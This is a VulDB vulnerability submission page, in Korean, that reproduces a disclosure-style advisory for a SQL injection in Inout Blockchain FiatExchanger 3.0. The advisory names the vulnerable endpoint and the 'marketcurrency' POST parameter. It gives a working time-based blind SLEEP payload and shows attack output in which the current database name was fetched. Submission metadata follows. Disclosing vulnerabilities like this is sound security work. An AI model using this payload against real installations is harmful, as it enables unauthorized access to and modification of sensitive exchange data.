제출 #177560: Inout Blockchain FiatExchanger 3.0 - SQL Injection정보

제목Inout Blockchain FiatExchanger 3.0 - SQL Injection
설명# Exploit Title: Inout Blockchain FiatExchanger 3.0 - SQL Injection # Date: 04/07/2023 # Exploit Author: CraCkEr # Vendor: Inout Scripts # Vendor Homepage: https://www.inoutscripts.com/ # Software Link: https://www.inoutscripts.com/products/inout-blockchain-fiatexchanger/ # Version: 3.0 # Tested on: Windows 10 Pro # Impact: Database Access Release Notes: SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /index.php/coins/update_marketboxslider ---------------------------------------------- POST /index.php/coins/update_marketboxslider HTTP/2 marketcurrency=[SQLI]&displaylimit=4 ---------------------------------------------- POST parameter 'marketcurrency' is vulnerable to SQL Injection --- Parameter: marketcurrency (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: marketcurrency=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&displaylimit=4 --- [+] Starting the Attack fetching current database current database: '*****_blockchain_fiatexchanger_**' [-] Done
사용자
 skalvin (UID 49463)
제출2023. 07. 04. PM 05:58 (3 연령 ago)
모더레이션2023. 07. 11. PM 05:26 (7 days later)
상태수락
VulDB 항목233577 [Nesote Inout Blockchain FiatExchanger 3.0 POST Parameter update_marketboxslider marketcurrency SQL 주입]
포인트들17

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!